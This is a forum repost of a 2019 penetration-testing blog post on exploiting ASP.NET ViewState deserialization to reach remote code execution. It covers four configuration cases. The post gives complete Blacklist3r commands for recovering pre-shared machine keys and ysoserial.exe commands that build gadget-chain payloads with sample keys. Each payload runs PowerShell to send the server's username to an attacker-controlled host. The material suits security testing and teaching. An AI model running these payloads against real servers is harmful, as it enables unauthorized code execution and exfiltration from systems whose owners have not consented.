Nytro Posted June 21, 2019 Report Posted June 21, 2019 Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net June 13, 2019 In this blog post, Sanjay talks of various test cases to exploit ASP.NET ViewState deserialization using Blacklist3r and YSoSerial.Net. Blacklist3r is used to identify the use of pre-shared (pre-published) keys in the application for encryption and decryption of forms authentication cookie, ViewState, etc. We discussed an interesting case of pre-published Machine keys, leading to an authentication bypass. Read more How to obtain MachineKey? There are multiple ways but not limited to the following to obtain the Machine Key used by a .NET application: Blacklist3r: If the application uses pre-shared machine key Directory Traversal attack to get access to web.config file Information Disclosure ViewState Deserialization Vulnerability Soroush Dalili (@irsdl) wrote an interesting article on Exploiting Deserialisation in ASP.NET via ViewState with the knowledge of validation, decryption keys, and algorithms. This is where Blacklist3r can be used, to identify the pre-shared machine keys and the required payloads can be generated using YSoSerial.Net. YSoSerial.Net supports multiple gadgets to generate payloads. We have used “TextFormattingRunProperties” and “TypeConfuseDelegate” gadget for the demonstration. Let us first understand what is ViewState and what are its attributes. What is ViewState? ViewState is the method that the ASP.NET framework uses by default to preserve page and control values between web pages. When the HTML for the page is rendered, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields. The following properties or combination of properties apply to ViewState information Base64 Can be defined using EnableViewStateMac and ViewStateEncryptionMode attribute set to false Base64 + MAC (Message Authentication Code) Enabled Can be defined using EnableViewStateMac attribute set to true Base64 + Encrypted Can be defined using viewStateEncryptionMode attribute set to true “EnableViewStateMac” and “ViewStateEncryptionMode” attribute In 2014 with ASP.NET >=1.1: Hotfix was released to forbid “EnableViewStateMac” attribute defined for the application. https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/ http://support.microsoft.com/kb/2905247 (Hotfix to forbid the settings) 2016 with ASP.NET >=4.5: As per the security advisory, the windows server enforce that the ViewState is MAC enabled and encrypted and “EnableViewStateMac” and “ViewStateEncryptionMode” attributes value is ignored if it was set to false. https://devblogs.microsoft.com/aspnet/secure-asp-net-viewstate/ However, it is still possible to disable ViewStateMac and Encryption by making changes in the configuration. Read more Test Cases The table below lists the possible scenarios for exploiting ViewState Deserialization flaws. Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false Machine Key not required Identifying ViewState Attributes The first step is to identify the ViewState attribute. As shown in the figure below, ViewState MAC and Encryption both are disabled which means it is possible to tamper ViewState without machine key. One can simply use the YSoSerial.Net to generate a serialized payload to perform Remote Code Execution. Command used to generate payload using YSoSerial.Net. ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out of band request containing the username. PoC of Successful Exploitation Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false Machine Key required Identifying ViewState Attributes The first step is to identify the ViewState attribute. As shown in the figure below, ViewState MAC is enabled and Encryption is disabled which means it is not possible to tamper ViewState without MachineKey (Validationkey). Obtaining a MachineKey using Blacklist3r Use Blacklist3r to identify usage of pre-shared machine key with the following command: AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy –encrypteddata = {__VIEWSTATE parameter value of the target application} –modifier = {__VIWESTATEGENERATOR parameter value} Once a valid Machine key is identified, the next step is to generate a serialized payload using YSoSerial.Net. ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" –generator = {__VIWESTATEGENERATOR parameter value} If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out of band request containing the username. PoC of Successful Exploitation Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true Machine Key required Identifying ViewState Attributes The first step is to identify the ViewState attribute. As shown in the figure below, Encryption is enabled which means it is not possible to tamper ViewState without MachineKey (Validationkey and Decryptionkey). Obtaining a MachineKey using Blacklist3r Blacklist3r module for this case is under development. If the Machinekey is known (e.g. via a directory traversal issue), YSoSerial.Net command used in the test case 2, can be used to perform RCE using ViewState deserialization vulnerability. Remove “__VIEWSTATEENCRYPTED” parameter from the request in order to exploit the ViewState deserialization vulnerability, else it will return a Viewstate MAC validation error and exploit will fail as shown in Figure: Test Case: 4 – .Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false Machine Key required Identifying ViewState Attributes The first step is to identify the ViewState attribute. As shown in the figure below, Encryption is enabled which means it is not possible to tamper ViewState without MachineKey (Validationkey and Decryptionkey). Obtaining a MachineKey using Blacklist3r Here we will use blacklist3r to identify usage of pre-shared machine key Run the following command using Blacklist3r AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx" –encrypteddata = {__VIEWSTATE parameter value} —IISDirPath = {Directory path of website in IIS} –TargetPagePath = {Target page path in application} For a more detailed description for IISDirPath and TargetPagePath. Refer here Once a valid Machine key is identified, the next step is to generate a serialized payload using YSoSerial.Net. ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2" --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out of band request containing the username. PoC of Successful Exploitation PoC of Successful Exploitation For all the test cases, if the ViewState YSoSerial.Net payload works successfully then the server responds with “500 Internal server error” having response content “The state information is invalid for this page and might be corrupted” and we get the OOB request as shown in Figures below: out of band request with the current username <marketing> For more such vulnerabilities and exploits, check out our upcoming training courses at Black Hat. https://www.notsosecure.com/blackhat-2019/ </marketing> References https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/ https://referencesource.microsoft.com/#System.Web/UI/ObjectStateFormatter.cs,6066a5b85c747197 https://github.com/pwntester/ysoserial.net/ https://portswigger.net/kb/issues/00400600_asp-net-viewstate-without-mac-enabled https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/ https://devblogs.microsoft.com/aspnet/secure-asp-net-viewstate/ http://support.microsoft.com/kb/2905247 https://github.com/Illuminopi/RCEvil.NET https://www.youtube.com/watch?v=2ZtMVuhtuuA https://github.com/0xacb/viewgen https://msdn.microsoft.com/en-us/data/ms178198(v=vs.99) https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.page.enableviewstatemac?view=netframework-4.8 Sursa: https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/ Quote